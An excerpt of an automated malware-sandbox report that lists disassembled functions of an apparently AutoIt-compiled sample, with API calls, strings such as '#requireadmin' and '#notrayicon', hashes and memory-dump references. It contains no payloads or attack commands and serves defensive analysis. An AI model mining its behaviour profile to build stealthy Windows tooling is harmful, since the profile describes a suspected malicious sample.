                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Delete$InfoItem
                                        • String ID: 0
                                        • API String ID: 135850232-4108050209
                                        • Opcode ID: b533ced31f9ec8391e9457f31488c4ce34ac44c48aaf28df5a427c4efd4624c4
                                        • Instruction ID: 2035a93aa86d34a4b05d8a036817808fad71e19c085e1966d7310a154c9c96f2
                                        • Opcode Fuzzy Hash: b533ced31f9ec8391e9457f31488c4ce34ac44c48aaf28df5a427c4efd4624c4
                                        • Instruction Fuzzy Hash: B141A6712043429FEB24DF29D844F5ABBE4AF85310F14861EF9A5973D2D770EA04CB62
                                        Function 00104416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0010CC08,00000000,?,?,?,?), ref: 001044AA
                                        • GetWindowLongW.USER32 ref: 001044C7
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001044D7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$Long
                                        • String ID: SysTreeView32
                                        • API String ID: 847901565-1698111956
                                        • Opcode ID: 67d31313166d94e3b4d9dbb95d5bd0d12b8e69f0285305c3a2759d1eda3ac1f7
                                        • Instruction ID: 4c220406eac87bd44d6023c88da81933407d0eceb5030f08bb026a49ddbc990f
                                        • Opcode Fuzzy Hash: 67d31313166d94e3b4d9dbb95d5bd0d12b8e69f0285305c3a2759d1eda3ac1f7
                                        • Instruction Fuzzy Hash: 20319071210605AFDB209F78DC85BEA77A9EB09334F204715FAB5D21D1D7B0EC909B50
                                        Function 000D6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SysReAllocString.OLEAUT32(?,?), ref: 000D6EED
                                        • VariantCopyInd.OLEAUT32(?,?), ref: 000D6F08
                                        • VariantClear.OLEAUT32(?), ref: 000D6F12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$AllocClearCopyString
                                        • String ID: *j
                                        • API String ID: 2173805711-725149108
                                        • Opcode ID: b5c137c7b622a3988a08a58010dfb129eae8d2d2ee2ce99a163ab1d835a5049c
                                        • Instruction ID: 997029ad33bd75d671a4dc018eec57d05a8b10a0dabcfc95930ca93f8b0fb7b3
                                        • Opcode Fuzzy Hash: b5c137c7b622a3988a08a58010dfb129eae8d2d2ee2ce99a163ab1d835a5049c
                                        • Instruction Fuzzy Hash: 6031A1B1604B05DBCB15AF64E850ABE37B5FF44304B1044AAF9068B3A2C7359D11DBE4
                                        Function 000F304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000F335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,000F3077,?,?), ref: 000F3378
                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000F307A
                                        • _wcslen.LIBCMT ref: 000F309B
                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 000F3106
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 946324512-2422070025
                                        • Opcode ID: de7fa98ccbe844ab6ddd98c50d593695872e5cafa519ecc6f1b0fc1aa57a1af0
                                        • Instruction ID: 3f828cbd77476df36a7cd246e7c0a7a47d24e8d5f197e1598eff835c2a414c07
                                        • Opcode Fuzzy Hash: de7fa98ccbe844ab6ddd98c50d593695872e5cafa519ecc6f1b0fc1aa57a1af0
                                        • Instruction Fuzzy Hash: C131F5356002099FCB20CF28C495EBA77E0EF54328F24C15AEA158BB92CB72DE41D761
                                        Function 00104653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00104705
                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00104713
                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0010471A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$DestroyWindow
                                        • String ID: msctls_updown32
                                        • API String ID: 4014797782-2298589950
                                        • Opcode ID: c3f964c7288e9df222afd7999b62a257e6a53b05446af6136cb38e993071101a
                                        • Instruction ID: e7cd82098f64551e532fb50e987db728a77648832914c4034a514f13d330dc7a
                                        • Opcode Fuzzy Hash: c3f964c7288e9df222afd7999b62a257e6a53b05446af6136cb38e993071101a
                                        • Instruction Fuzzy Hash: CE2160F5600208AFEB10DF68DCD1DA737ADEF5A398B040459FA409B3A1DB71EC51CA60
                                        Function 000D95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                        • API String ID: 176396367-2734436370
                                        • Opcode ID: 38bf9dfe62cf8636ea23f20d514f9bdea684903053e19ab4005778974508da0c
                                        • Instruction ID: 70850a293ff43ab01581df1728942895ce64be9fe7b07cd522cc40913f8d9b06
                                        • Opcode Fuzzy Hash: 38bf9dfe62cf8636ea23f20d514f9bdea684903053e19ab4005778974508da0c
                                        • Instruction Fuzzy Hash: 6321383220471166C771BA249C02FFB73D8AF51310F10803BF94997286EB95ED52D3B5
                                        Function 001037B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00103840
                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00103850
                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00103876
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$MoveWindow
                                        • String ID: Listbox
                                        • API String ID: 3315199576-2633736733
                                        • Opcode ID: 003001cb538d2a40ef0da1af5856f1c203df7dc946809cc8bb6c331360869f7d
                                        • Instruction ID: 733ad0db92cac8cbc2a4456d1e79eb4c04769c429a2ac4dbc2438ef0cee095ad
                                        • Opcode Fuzzy Hash: 003001cb538d2a40ef0da1af5856f1c203df7dc946809cc8bb6c331360869f7d
                                        • Instruction Fuzzy Hash: 23218072610118BBEB218F54CC45FAB376EEF89750F118225F9959B1D0CBB1DC528BA0
                                        Function 000E49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000E4A08
                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 000E4A5C
                                        • SetErrorMode.KERNEL32(00000000,?,?,0010CC08), ref: 000E4AD0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorMode$InformationVolume
                                        • String ID: %lu
                                        • API String ID: 2507767853-685833217
                                        • Opcode ID: f8c0cf514da0b517122369d60a1e0b50de8f5833c2ca646a42518adc35d4d6c5
                                        • Instruction ID: 0c7e98f28fce3fa9bb0f86b94467410b41a08a74b55f1695f92a43751df7911e
                                        • Opcode Fuzzy Hash: f8c0cf514da0b517122369d60a1e0b50de8f5833c2ca646a42518adc35d4d6c5
                                        • Instruction Fuzzy Hash: 78315175A00109AFDB10DF64C985EAABBF8EF08318F1480A5F909EB252D775ED45CFA1
                                        Function 001041EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0010424F
                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00104264
                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00104271
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: msctls_trackbar32
                                        • API String ID: 3850602802-1010561917
                                        • Opcode ID: b63cab76178f4ea7de27d9d9c20b520b44b32558cc7f369ed79c38b35bb938f7
                                        • Instruction ID: 646fe333dfb5638e9ba0ad01eb252eef8e0e9c280e0b8dbbcb1304336af32cd6
                                        • Opcode Fuzzy Hash: b63cab76178f4ea7de27d9d9c20b520b44b32558cc7f369ed79c38b35bb938f7
                                        • Instruction Fuzzy Hash: 7B11C171240208BFEF209E28DC46FAB3BACEF95B54F010124FA95E20E0D7B1D8619B50
                                        Function 000D2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                          • Part of subcall function 000D2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000D2DC5
                                          • Part of subcall function 000D2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D2DD6
                                          • Part of subcall function 000D2DA7: GetCurrentThreadId.KERNEL32 ref: 000D2DDD
                                          • Part of subcall function 000D2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000D2DE4
                                        • GetFocus.USER32 ref: 000D2F78
                                          • Part of subcall function 000D2DEE: GetParent.USER32(00000000), ref: 000D2DF9
                                        • GetClassNameW.USER32(?,?,00000100), ref: 000D2FC3
                                        • EnumChildWindows.USER32(?,000D303B), ref: 000D2FEB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                        • String ID: %s%d
                                        • API String ID: 1272988791-1110647743
                                        • Opcode ID: 981a4cef198a5202cf390651fcc7448abf558f69c42304e81fcd00275ad108fa
                                        • Instruction ID: 83e4363cb862d363a7577e3abb7c5988df0d6d06dae717992aa79d1a0aa59600
                                        • Opcode Fuzzy Hash: 981a4cef198a5202cf390651fcc7448abf558f69c42304e81fcd00275ad108fa
                                        • Instruction Fuzzy Hash: 9711AF756003056BCF547F708C95EEE37AAAF94304F048076B90A9B393DF719A498B71
                                        Function 00105882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001058C1
                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001058EE
                                        • DrawMenuBar.USER32(?), ref: 001058FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$InfoItem$Draw
                                        • String ID: 0
                                        • API String ID: 3227129158-4108050209
                                        • Opcode ID: 86d29667a8e9037e2f801a9e594b488e69e8126965210b88e5ceaf4d323d4602
                                        • Instruction ID: fea2b465b4823b83369e57c0c1b382f9068f34855f773a08b0926e3f15af0562
                                        • Opcode Fuzzy Hash: 86d29667a8e9037e2f801a9e594b488e69e8126965210b88e5ceaf4d323d4602
                                        • Instruction Fuzzy Hash: EB016D35600218EFDB219F21DC44BEFBBB5FB45365F108099F889D6191DBB08A94DF61
                                        Function 000D007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 88a8dc5c1d9532712493f9a0ba64c3877d30c387c54414d9db53ea57e6d26ac5
                                        • Instruction ID: 7582ba3bc3de17d4d2e3793be942df2c405d16fbd1e488633146b006fea5c2bf
                                        • Opcode Fuzzy Hash: 88a8dc5c1d9532712493f9a0ba64c3877d30c387c54414d9db53ea57e6d26ac5
                                        • Instruction Fuzzy Hash: 2BC11975A00216EFDB14CFA4C898BAEB7B9FF48704F108599E509EB251D771EE41CBA0
                                        Function 000F342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInitInitializeUninitialize
                                        • String ID:
                                        • API String ID: 1998397398-0
                                        • Opcode ID: 3e50f875b11320e29030741362d17bd4d49faab91ee673b698871d8bc852dc96
                                        • Instruction ID: c26c1c572f3e22a47e682b6cc4b83da5eb0b7b3d8e093824882d1d3b09c96a61
                                        • Opcode Fuzzy Hash: 3e50f875b11320e29030741362d17bd4d49faab91ee673b698871d8bc852dc96
                                        • Instruction Fuzzy Hash: 2AA189756047049FC710EF28C485A6AB7E4FF88724F14885DFA8A9B362DB74EE00CB95
                                        Function 000D0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D05F0
                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D0608
                                        • CLSIDFromProgID.OLE32(?,?,00000000,0010CC40,000000FF,?,00000000,00000800,00000000,?,0010FC08,?), ref: 000D062D
                                        • _memcmp.LIBVCRUNTIME ref: 000D064E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FromProg$FreeTask_memcmp
                                        • String ID:
                                        • API String ID: 314563124-0
                                        • Opcode ID: 7de53ac5f90c94167d6e762e57f13e9fe58b1ab72585dd551eb91b00e9ce77c8
                                        • Instruction ID: bbb40cec883fe512f1b2268d464f5460c52196619947500f6c2beb55d6900803
                                        • Opcode Fuzzy Hash: 7de53ac5f90c94167d6e762e57f13e9fe58b1ab72585dd551eb91b00e9ce77c8
                                        • Instruction Fuzzy Hash: 7181FC75A00209EFCB04DF94C984EEEB7B9FF89315F208559E506AB250DB71AE46CF60
                                        Function 000B1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 8e7ccf4ed4f2c58a9bdf6e851ee6cf586e05a0e61a3c4ddfde581e1a7c91f275
                                        • Instruction ID: ee386dd587fcdf4f617b64714f22ed13c8e3d1edb1f8350d581f122afeab1f5b
                                        • Opcode Fuzzy Hash: 8e7ccf4ed4f2c58a9bdf6e851ee6cf586e05a0e61a3c4ddfde581e1a7c91f275
                                        • Instruction Fuzzy Hash: 84416731A00501ABDF317BFD8C56BFE3AE4EF46770F644225F418D6293EB348941A2A2
                                        Function 00106278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(0142E8C0,?), ref: 001062E2
                                        • ScreenToClient.USER32(?,?), ref: 00106315
                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00106382
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ClientMoveRectScreen
                                        • String ID:
                                        • API String ID: 3880355969-0
                                        • Opcode ID: 039addb50de65f0c2634d11f76b80dffcb5b70743694dd957573cae0fc0b2808
                                        • Instruction ID: 99c6a8910f73a7ed03fdfa567427be359cbabb98b8e6c3115a58df69be02763d
                                        • Opcode Fuzzy Hash: 039addb50de65f0c2634d11f76b80dffcb5b70743694dd957573cae0fc0b2808
                                        • Instruction Fuzzy Hash: 3C510D74A00209EFDB20DF54D881AAE7BB5FB55364F108259F8999B2E0D770ED91CB90
                                        Function 000F1AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 000F1AFD
                                        • WSAGetLastError.WSOCK32 ref: 000F1B0B
                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 000F1B8A
                                        • WSAGetLastError.WSOCK32 ref: 000F1B94
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ErrorLast$socket
                                        • String ID:
                                        • API String ID: 1881357543-0
                                        • Opcode ID: a5de9939c6b0e30e9f1914f904fda85a91e8ae4d1d805e06f41762a912774a6f
                                        • Instruction ID: 9a9b00d50fd279e7cc73a60ce0fb9065c52c3e36610b98f4644a7808fa0fcb74
                                        • Opcode Fuzzy Hash: a5de9939c6b0e30e9f1914f904fda85a91e8ae4d1d805e06f41762a912774a6f
                                        • Instruction Fuzzy Hash: F541D174640200AFE720AF20C886FB977E5AB44718F54C458FA5A9F7D3D776ED418B90
                                        Function 000AB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
